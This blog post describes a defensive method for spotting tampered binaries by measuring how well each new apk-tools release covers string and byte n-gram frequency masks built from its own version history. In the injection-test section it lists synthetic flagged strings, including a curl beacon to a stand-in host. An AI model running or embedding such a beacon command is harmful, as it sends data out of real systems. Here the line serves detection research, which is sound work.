Detecting anomalous binaries by measuring drift from their own version history | Lisandro Fernández Rocha

Detecting anomalous binaries by measuring drift from their own version history

Published: March 06, 2026
awkbinary-analysissoftware-integritysupply-chain-securityconcatenative-synthesismaskingbinary-inspectionstatic-analysisfrequency-analysisanomaly-detectionunix

Frequency masking on embedded binary strings

Can a binary be evaluated against the statistical structure of its own version history?

Verifying the integrity of distributed binaries usually depends on reproducible builds or vendor signatures. This post shows a simple experiment using nine versions of Alpine’s apk binary.

In practice, both assumptions often fail.

Many projects do not provide reproducible builds, and closed binaries cannot be rebuilt independently. When a suspicious binary appears, the only options are usually signature matching or full reverse engineering.

Detecting binary drift with frequency masks

The method builds a frequency mask of invariant strings across a corpus of known-good versions and measures how much of that invariant structure a target binary still covers.

Alpine apk-tools coverage (unigram & byte n-gram)

Unit3.14–3.223.23 outlier
Strings71–80%40%
Byte n-grams23–28%13.6%

This is an extension of a method developed in “Me gustan las listas”, where frequency masks were applied to text corpora to remove boilerplate.

The post covers two analyses. The first treats each line of strings output as a unit (unigram). The second operates on the continuous printable byte sequence of the binary, with no line cuts, using a sliding window to extract character n-grams. Both use the same frequency mask construction and coverage measurement. Raff et al. (2018) observed, in a different context, that most information carried by byte n-grams is recoverable from string features alone. The two analyses here are designed around that complementarity.

A note on the synthesis traditions that informed the framing: granular synthesis decomposes a signal into small time-domain grains and analyzes each individually. Concatenative synthesis extends that to the transitions between grains, because the join carries information that neither grain contains alone. Ó Nuanáin, Herrera and Jordà describe this distinction precisely in the context of rhythmic pattern generation (ISMIR 2016). Applied here: the string is the grain in the first analysis. The byte sequence with a sliding window is the concatenative extension: no arbitrary cuts. The grain becomes a fixed-width window over the continuous character sequence.

A parenthesis as grateful attribution: Sergi Jordà presented this distinction at “Creación Musical Interactiva: del Reactable a las redes musicales,” Centro Cultural de España en Buenos Aires, 2009. The idea that concatenative synthesis considers the join between grains, not only the grains themselves, came from that room.


The observation

Every compiled binary carries embedded strings: error messages, format strings, symbol names, library paths, command-line option descriptions. These strings are largely stable across patch releases. The error messages in apk-tools 2.14.4 are the same as in apk-tools 2.14.9. The option descriptions did not change.

Version identifiers and build timestamps do change, but they are a small fraction of the total string population.

Given a corpus of known-good versions of the same binary, most strings appear in most versions. A binary with an anomalous string population is worth investigating.


Corpus: Alpine apk-tools from release ISOs

The corpus is sbin/apk extracted directly from Alpine Linux release ISOs, 3.14 through 3.22. Each ISO ships apk-tools as a .apk package in /apks/x86_64/. The package is a gzip tar. No installation required.

mount -o loop,ro isos/alpine-standard-3.22.0-x86_64.iso mnt/3.22

tar -xzf mnt/3.22/apks/x86_64/apk-tools-2.14.9-r2.apk \
    --to-stdout sbin/apk > binaries/apk-tools/apk-tools-3.22

strings binaries/apk-tools/apk-tools-3.22 > strings/apk-tools/3.22.txt
Alpineapk-toolssizestrings
3.142.12.5-r169712B746
3.152.12.7-r369768B749
3.162.12.9-r369624B755
3.172.12.10-r169560B756
3.182.14.0-r069632B846
3.192.14.0-r569648B843
3.202.14.4-r069648B827
3.212.14.6-r269648B864
3.222.14.9-r269648B856

Binary sizes cluster around 69.6KB through the 2.12.x and 2.14.x series. All 9 binaries have distinct SHA256 hashes.

Alpine 3.23 ships apk-tools 3.0.1, a rewrite. Its binary is 115096B.


Automatic corpus boundary detection

Before building the mask, binary sizes are compared against the corpus median. Any binary that deviates more than 20% from the median is excluded from mask construction and evaluated separately.

sorted_sizes=$(for ver in "${VERSIONS[@]}"; do echo "${SIZES[$ver]}"; done | sort -n)
mid=$(( (count + 1) / 2 ))
median=$(echo "$sorted_sizes" | sed -n "${mid}p")
lo=$(echo "scale=0; $median * 80 / 100" | bc)
hi=$(echo "scale=0; $median * 120 / 100" | bc)
median: 69648B       range: 55718B - 83577B

3.14 - 3.22  [corpus]     69560B - 69768B
3.23         [outlier]    115096B  (65% above median)

The 3.23 rewrite is detected automatically. No version numbers are hardcoded. The PACKAGE variable at the top of the script is the only thing that changes when applying this to a different binary.


Building the frequency mask

For each unit of analysis, count how many distinct files in the corpus contain it. Units present in at least threshold fraction of the corpus become the mask.

The key distinction: count by distinct file, not by total occurrences. A string that appears 50 times in one binary contributes 1 to the frequency count. A string that appears once in 7 of 9 corpus files contributes 7.

The mask is built in a single awk pass over all corpus files:

FNR == 1 { delete seen }
{
    if (seen[$0]) next
    seen[$0] = 1
    freq[$0]++
}
END {
    for (s in freq)
        if (freq[s] >= min) print s
}

FNR == 1 resets the per-file deduplication set at each new file. The full corpus of 9 files processes in under 0.25 seconds.


Analysis 1: unigram coverage

At threshold 0.75, the mask contains 513 strings.

Alpineapk-toolscovered/totalcoverage
3.142.12.5-r1574/74676.9%
3.152.12.7-r3580/74977.4%
3.162.12.9-r3581/75576.9%
3.172.12.10-r1611/75680.8%
3.182.14.0-r0627/84674.1%
3.192.14.0-r5634/84375.2%
3.202.14.4-r0623/82775.3%
3.212.14.6-r2617/86471.4%
3.222.14.9-r2617/85672.0%

Corpus coverage: 71% to 80%.

Alpineapk-toolscovered/totalcoverage
3.233.0.1-r1532/131740.3%outlier, major version rewrite
Unigram coverage

How the sliding window works

A binary file is a stream of bytes. Each byte is one value between 0 and 255, written in hex as two digits: 00 to FF.

Take two known-good versions as corpus:

corpus 1: "hello world"
corpus 2: "hello words"

pos:  1   2   3   4   5   6   7   8   9  10  11
chr:  h   e   l   l   o       w   o   r   l   d
hex: 68  65  6C  6C  6F  20  77  6F  72  6C  64

chr:  h   e   l   l   o       w   o   r   d   s
hex: 68  65  6C  6C  6F  20  77  6F  72  64  73

A window of grain=4 step=1 moves like this. Each window produces one n-gram. No byte determines a cut. The window moves forward by 1 and reads 4.

W1: [h  e  l  l]   68 65 6C 6C   corpus1 ✓  corpus2 ✓
W2: [e  l  l  o]   65 6C 6C 6F   corpus1 ✓  corpus2 ✓
W3: [l  l  o   ]   6C 6C 6F 20   corpus1 ✓  corpus2 ✓
W4: [l  o     w]   6C 6F 20 77   corpus1 ✓  corpus2 ✓
W5: [o     w  o]   6F 20 77 6F   corpus1 ✓  corpus2 ✓
W6: [   w  o  r]   20 77 6F 72   corpus1 ✓  corpus2 ✓
W7: [w  o  r  l]   77 6F 72 6C   corpus1 ✓  corpus2 ✗
W8: [o  r  l  d]   6F 72 6C 64   corpus1 ✓  corpus2 ✗

At threshold=0.75, W7 and W8 do not make it into the mask. They appeared in only one of two documents.

Three targets against this mask:

"hello words" — known subject, can pass:

                   "hello world"      "hello words"
W1: [h  e  l  l]   68 65 6C 6C   ✓   68 65 6C 6C   ✓
W2: [e  l  l  o]   65 6C 6C 6F   ✓   65 6C 6C 6F   ✓
W3: [l  l  o   ]   6C 6C 6F 20   ✓   6C 6C 6F 20   ✓
W4: [l  o     w]   6C 6F 20 77   ✓   6C 6F 20 77   ✓
W5: [o     w  o]   6F 20 77 6F   ✓   6F 20 77 6F   ✓
W6: [   w  o  r]   20 77 6F 72   ✓   20 77 6F 72   ✓
W7: [w  o  r  d]   77 6F 72 6C   ✗   77 6F 72 64   ✗
W8: [o  r  d  s]   6F 72 6C 64   ✗   6F 72 64 73   ✗

Coverage: 6/8 = 75%. W7 and W8 differ between the two corpus documents. The threshold dropped them from the mask. The greeting passes.

"hello earth" — second word different:

W1: [h  e  l  l]   68 65 6C 6C   ✓
W2: [e  l  l  o]   65 6C 6C 6F   ✓
W3: [l  l  o   ]   6C 6C 6F 20   ✓
W4: [l  o     e]   6C 6F 20 65   ✗
W5: [o     e  a]   6F 20 65 61   ✗
W6: [   e  a  r]   20 65 61 72   ✗
W7: [e  a  r  t]   65 61 72 74   ✗
W8: [a  r  t  h]   61 72 74 68   ✗

Coverage: 3/8 = 37%. W4 is the first window to include the changed byte. Five consecutive windows register it until it is no longer considered. W1 through W3 did not see it because the change was outside their range.

The mask:

[h  e  l  l]   68 65 6C 6C   "hell"
[e  l  l  o]   65 6C 6C 6F   "ello"
[l  l  o   ]   6C 6C 6F 20   "llo "
[l  o     w]   6C 6F 20 77   "lo w"
[o     w  o]   6F 20 77 6F   "o wo"
[   w  o  r]   20 77 6F 72   " wor"

Six sequences. Every document that starts with hello w covers the first five before anything else matters. The mask does not know it is detecting greetings. It knows those six byte patterns were present in every document it was given.

"bye bye now" — completely different:

W1: [b  y  e   ]   62 79 65 20   ✗
W2: [y  e     b]   79 65 20 62   ✗
W3: [e     b  y]   65 20 62 79   ✗
W4: [   b  y  e]   20 62 79 65   ✗
W5: [b  y  e   ]   62 79 65 20   ✗
W6: [y  e     n]   79 65 20 6E   ✗
W7: [e     n  o]   65 20 6E 6F   ✗
W8: [   n  o  w]   20 6E 6F 77   ✗

Coverage: 0/8 = 0%. None of these sequences were in the corpus.


Analysis 2: byte n-gram coverage

The unigram analysis treats each line of strings output as a unit. That cut is a null byte in the binary. There is no semantic significance to that boundary.

The byte n-gram analysis removes that cut entirely. The binary is read as a continuous sequence of printable bytes and a sliding window extracts fixed-width character n-grams:

tr -cd '\040-\176' < binary | awk -v grain="$GRAIN" -v step="$STEP" '
{ seq = seq $0 }
END {
    n = length(seq)
    for (i = 1; i + grain - 1 <= n; i += step)
        print substr(seq, i, grain)
}'

No strings, no line cuts, no dependency on null byte positions. The same frequency mask construction runs on the resulting n-gram files.

Each binary has approximately 19,000-21,000 printable characters in the 2.x series. Alpine 3.23 has 33,680.

grain=6 step=2

Mask contains 2253 n-grams.

Alpineapk-toolscovered/totalcoverage
3.142.12.5-r12319/977023.7%
3.152.12.7-r32716/984427.5%
3.162.12.9-r32457/985224.9%
3.172.12.10-r12557/1000425.5%
3.182.14.0-r02556/1078323.7%
3.192.14.0-r52793/1049926.6%
3.202.14.4-r02805/1057926.5%
3.212.14.6-r22703/1070825.2%
3.222.14.9-r22970/1068727.7%

Outlier: 3.23: 2293/16838 (13.6%)

Corpus range 23.7-27.7%, outlier 13.6%. The separation is cleaner. The grain size and step are parameters that trade mask density for specificity. A larger corpus would allow larger grains without losing separation.

Byte n-gram coverage

Injection test

The injection test appends synthetic strings to apk-tools-3.22 and measures unigram coverage against the mask.

Baseline: 617/856 (72.0%)

injectedtotalcoveredcoveragedelta
+185761771.9%-0.1%
+586161771.6%-0.4%
+1086661771.2%-0.8%
+2087661770.4%-1.6%
+5090661768.1%-3.9%

Sample strings flagged as new:

> PWNED_BY_SUPPLIER_X
> backdoor.collection.exfil
> curl http://evil.internal/beacon

Coverage decreases monotonically. The covered count does not change: the injected strings are absent from the mask and the known strings remain known.


Properties

No reproducibility requirement. The mask is built from observed populations in version history. Two builds of the same source with different timestamps produce nearly identical string populations. Both score near the corpus baseline.

Closed binaries. The analysis requires only read access to the binary. No source, no debug symbols, no build metadata.

No prior signature. The corpus is built from version history available without authentication: public package repositories, OCI registries, release ISOs. No PKI, no key management.

Proportional signal. Coverage is a continuous metric. The alert threshold is inferred from the observed distribution of known-good versions.

Two complementary signals. Unigram coverage detects new strings. Byte n-gram coverage operates on the raw character sequence without depending on tool-imposed cuts.


Limitations

The analysis detects string population anomalies, not arbitrary code modifications. A modification that reuses existing strings in existing positions will not change either metric.

The corpus must be known-good. A change present in all corpus versions becomes part of the mask. The method assumes the corpus is clean.

strings output and tr output depend on tool configuration. Minimum length, encoding and platform affect results. The corpus and target must be processed identically.

Grain size and corpus size are coupled. A grain of 8 characters requires a larger corpus to produce a stable mask than a grain of 6. With 9 versions, grain=6 step=2 produces better separation than grain=8 step=4.


Where this fits if the pipeline is already signed

A signature certifies that a specific process signed a specific artifact. It does not certify that the artifact is semantically consistent with prior versions of itself. A build step that modifies a binary after compilation and before signing produces a valid signature on a modified artifact.

Coverage analysis answers a different question: is this artifact what it has always been. The two signals are orthogonal. Signature verification is a gate. Coverage analysis is a baseline. Gates are binary. Baselines are continuous.


Coverage as a time series

A single coverage measurement detects whether a specific version is anomalous. A time series detects whether the binary is drifting.

This is the natural shape for a build pipeline dashboard: every release of a dependency plotted as a point, drift visible as slope before any single artifact crosses an alert threshold.

A binary that loses 0.5% coverage per release over ten releases triggers no per-artifact alert. The cumulative drop is visible as slope on a chart.

A second derived metric is mask variance: how much the mask itself changes when rebuilt with a sliding window corpus. A stable binary produces a stable mask. A mask that gains or loses many entries between consecutive rebuilds signals that the population is in flux. Coverage measures the target. Mask variance measures the baseline.


When this is useful

This method is not meant to replace reproducible builds, signatures, or deep binary analysis. Instead, it works as a lightweight anomaly detector that can help identify binaries worth closer inspection.

Some practical situations where this approach can be useful:

Parole, for opaque providers, before deployment. When a vendor delivers updated binaries on a regular cadence without source access or build transparency, the version history of those deliveries becomes the corpus. Each new delivery is measured against the mask built from previous ones. A provider whose binaries have been consistent for twelve releases and then shift significantly on the thirteenth is worth a conversation before deployment.

Validating binaries from untrusted mirrors. When software is downloaded from unofficial mirrors or secondary distribution channels, a quick frequency mask check can indicate whether the binary statistically resembles known-good releases.

Quick triage before reverse engineering. Before investing time in full static analysis or reverse engineering, this method can provide a fast signal about whether a binary deviates significantly from the structure of previous versions.

Monitoring dependencies drift across releases By maintaining a corpus of historical binaries, it becomes possible to track structural drift between releases and detect unusual changes that may indicate build process alterations, toolchain changes, or potential supply-chain issues.


Reproducible builds try to prove that two binaries are identical.

This experiment takes a different direction: measuring how far a binary deviates from the statistical structure of its own release history. In many practical cases, detecting drift is already enough to justify deeper inspection.

In practice, this method provides a fast, low-overhead signal to flag unusual changes or potential tampering in binaries without needing source access, reproducible builds, or signatures. By tracking how structure shifts between releases, maintainers and security teams can quickly prioritize and inspect anomalous artifacts, complementing existing verification methods with a continuous, proportional metric rather than a simple pass/fail check.